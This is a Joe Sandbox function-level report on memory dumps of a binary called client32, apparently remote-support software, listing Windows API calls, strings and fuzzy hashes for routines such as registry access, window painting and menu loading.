Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED

_malloc.LIBCMT ref: 110EB14E
RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB17A
_free.LIBCMT ref: 110EB203

Strings

Error %d getting %s, xrefs: 110EB1BD

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast_malloc
String ID: Error %d getting %s
API String ID: 582965682-2709163689
Opcode ID: 9bff1f37e75fcc18e7aeaab05f9b388b64247037a167967b193f88d1d216f0d9
Instruction ID: 53ee35c367f0f4a38b634750d2b963ed9aac3e35d2351b44fe080ad2754011a1
Opcode Fuzzy Hash: 9bff1f37e75fcc18e7aeaab05f9b388b64247037a167967b193f88d1d216f0d9
Instruction Fuzzy Hash: 20316175D001299FDB50DA55CC84BAEB7F9AF85314F40C0E9E959A7240DE30AE85CBE1

Function 11009570 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110CEEB0: wvsprintfA.USER32(?,?,00000000), ref: 110CEEE2

WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009626
WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100963B

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

IsA(), xrefs: 110095DD, 11009605
<HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 110095A9
<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009635
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095D8, 11009600

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 863766397-389219706
Opcode ID: 9a816948f6b0678b02576a9906659843a18032fc7dc2c71b41f63bde39e905f6
Instruction ID: c43f9d7e7a46378d94fec254dd1f0663a41d06cab59106702bb4ccdf65445973
Opcode Fuzzy Hash: 9a816948f6b0678b02576a9906659843a18032fc7dc2c71b41f63bde39e905f6
Instruction Fuzzy Hash: C0215175E0051EABDB00DF95DC41FDEF3B8EF49614F104659E921B3280EB786904CBA1

Function 1115F4D2 Relevance: 10.6, APIs: 7, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,1115F5D6,?,111D6F08,0000000C,1115F602,?,?,11169CDB,11173732), ref: 1115F4E7
DecodePointer.KERNEL32(?,?,?,?,?,1115F5D6,?,111D6F08,0000000C,1115F602,?,?,11169CDB,11173732), ref: 1115F4F4
__realloc_crt.LIBCMT ref: 1115F531
__realloc_crt.LIBCMT ref: 1115F547
EncodePointer.KERNEL32(00000000,?,?,?,?,?,1115F5D6,?,111D6F08,0000000C,1115F602,?,?,11169CDB,11173732), ref: 1115F559
EncodePointer.KERNEL32(?,?,?,?,?,?,1115F5D6,?,111D6F08,0000000C,1115F602,?,?,11169CDB,11173732), ref: 1115F56D
EncodePointer.KERNEL32(-00000004,?,?,?,?,?,1115F5D6,?,111D6F08,0000000C,1115F602,?,?,11169CDB,11173732), ref: 1115F575

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: c4e2ac52f39b5c5058488f6e2170a97ca40770599b35985c559bca36538ca031
Instruction ID: 468d29d2df38fac3cad0c1f273e586f2278255660d23d186df77b946bfe4e7f0
Opcode Fuzzy Hash: c4e2ac52f39b5c5058488f6e2170a97ca40770599b35985c559bca36538ca031
Instruction Fuzzy Hash: 1C11D632610227AFDB419FA9DCC085EFBE9EB4522C721443AE812D3140EB71ED40CB82

Function 110055F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 1100562D
BeginPaint.USER32(?,?), ref: 11005638
BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100565A
EndPaint.USER32(?,?), ref: 1100567F

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 11005618
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11005613

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1216912278-2830328467
Opcode ID: 0a657eaac7784f981e952c5b4eda356fa1cc928cec26e5dc3949966a725d6846
Instruction ID: 9f5d66c176a0b7e7ec85eb6ceccc236f995905c2b82002c2a0bf4ef6a700b935
Opcode Fuzzy Hash: 0a657eaac7784f981e952c5b4eda356fa1cc928cec26e5dc3949966a725d6846
Instruction Fuzzy Hash: 35114C75A40219BFE715DBA0CC85FAEF3BCEB88718F108529F6169A180EA70A904C765

Function 110B9080 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,FFCE8B2C,?,8F13E808,C085FFFA,00000001,?,76937AA0,?,?,?,110B9793,76937C74,?,?,00000000), ref: 110B90EE

Strings

Min, xrefs: 110B90BB
j CB::SetWindowSize(%s), xrefs: 110B90F5
???, xrefs: 110B909F
Max, xrefs: 110B90CF, 110B90F4
Norm, xrefs: 110B90D8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MoveWindow
String ID: ???$Max$Min$Norm$j CB::SetWindowSize(%s)
API String ID: 2234453006-849929726
Opcode ID: 1f9178bd798435d4a9f7d01721b51b69abe7ab4725fbd077eace246e56df829d
Instruction ID: 9e3dfbfd4cbfd574ed7d23d514b689c65e11d8274e5870f27b61d133f33f0f70
Opcode Fuzzy Hash: 1f9178bd798435d4a9f7d01721b51b69abe7ab4725fbd077eace246e56df829d
Instruction Fuzzy Hash: 0C11C8B9A001449FD700DB9CDC85E5ABBA8FF88714B15C185FE089B312D171EC01C7A0

Function 1100B230 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B240
EnterCriticalSection.KERNEL32(?,?,1100BE7B,?,00000000,00000002), ref: 1100B279
EnterCriticalSection.KERNEL32(?,?,1100BE7B,?,00000000,00000002), ref: 1100B298

Part of subcall function 1100A1A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1BE
Part of subcall function 1100A1A0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A1E8
Part of subcall function 1100A1A0: GetLastError.KERNEL32 ref: 1100A1F0
Part of subcall function 1100A1A0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A204
Part of subcall function 1100A1A0: CloseHandle.KERNEL32(00000000), ref: 1100A20B

waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE7B,?,00000000,00000002), ref: 1100B2A8
LeaveCriticalSection.KERNEL32(?,?,1100BE7B,?,00000000,00000002), ref: 1100B2AF
_free.LIBCMT ref: 1100B2B8
_free.LIBCMT ref: 1100B2BE

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: e72ae2660a72024a37916babf9a0195b308b2880c1b138b54eb165fb961b2ec0
Instruction ID: fa89e9653f4791fe6b7112d01d8923e7b5b8fb3c01d96a6905fb0dd0b7110959
Opcode Fuzzy Hash: e72ae2660a72024a37916babf9a0195b308b2880c1b138b54eb165fb961b2ec0
Instruction Fuzzy Hash: 63118279900716ABE711CFA0DC88BEFB3ECAF49399F004619FA2696140D770B541CB62

Function 111130F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 1111311F
RegCloseKey.ADVAPI32(00000000), ref: 11113157
RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 11113173
RegCloseKey.ADVAPI32(00000000), ref: 1111317D

Part of subcall function 1113F3A0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,76938400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0

Strings

Timeout, xrefs: 1111313E, 1111316D
System\CurrentControlSet\Control\GraphicsDrivers\DCI, xrefs: 1111310E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
API String ID: 3962714758-504756767
Opcode ID: c46cdfa57b2f8145e01307e24912d12fa6f61ba6cfc8a53e9fe9385172041732
Instruction ID: 8185ff2203c8340135b0607d709f7464e4d9acf24e2e7ee59339e659b30d84cc
Opcode Fuzzy Hash: c46cdfa57b2f8145e01307e24912d12fa6f61ba6cfc8a53e9fe9385172041732
Instruction Fuzzy Hash: E90180B4A00209BFEB00DBA0CC49FAEF778AB44715F108158FE05EA184D770A6088BA6

Function 1101D340 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D34E
LoadIconA.USER32(00000000,0000139A), ref: 1101D39F
LoadCursorA.USER32(00000000,00007F00), ref: 1101D3AF
RegisterClassExA.USER32(00000030), ref: 1101D3D1
GetLastError.KERNEL32 ref: 1101D3D7

Strings

0, xrefs: 1101D35C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: bf222f5cf6771b3ad77bb914738adf0d57a68b301226ab599d0276dc8864ef78
Instruction ID: c3a1aa1c9dc0e20497c4fde615512ea724899bcb1f6dc83f2bf2d0086ea889f8
Opcode Fuzzy Hash: bf222f5cf6771b3ad77bb914738adf0d57a68b301226ab599d0276dc8864ef78
Instruction Fuzzy Hash: 73015274C1131AABDB00DFE0D99DBDDFBB4AB0430CF108529F615BA284E7B951048F96

Function 110033D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF1), ref: 110033DD
GetSubMenu.USER32(00000000,00000000), ref: 11003403
DestroyMenu.USER32(00000000), ref: 11003432

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

hMenu, xrefs: 110033F3
hSub, xrefs: 11003419
..\CTL32\annotate.cpp, xrefs: 110033EE, 11003414

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: d973dee63d8282570c310381642cc7a37d683fc462c6d0c9d0460e2ea6fc5953
Instruction ID: 589a1f8d6b7d0df236dfdd7a277f031fd69b34cc2dc2f81643ac8047fba249ee
Opcode Fuzzy Hash: d973dee63d8282570c310381642cc7a37d683fc462c6d0c9d0460e2ea6fc5953
Instruction Fuzzy Hash: 88F0A03EF4016A67D61362667C49F8FBA588BC16ACF160032FA14BE685ED64B40181FA

Function 110032E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 110032ED
GetSubMenu.USER32(00000000,00000000), ref: 11003313
DestroyMenu.USER32(00000000), ref: 11003342

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

hMenu, xrefs: 11003303
hSub, xrefs: 11003329
..\CTL32\annotate.cpp, xrefs: 110032FE, 11003324

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
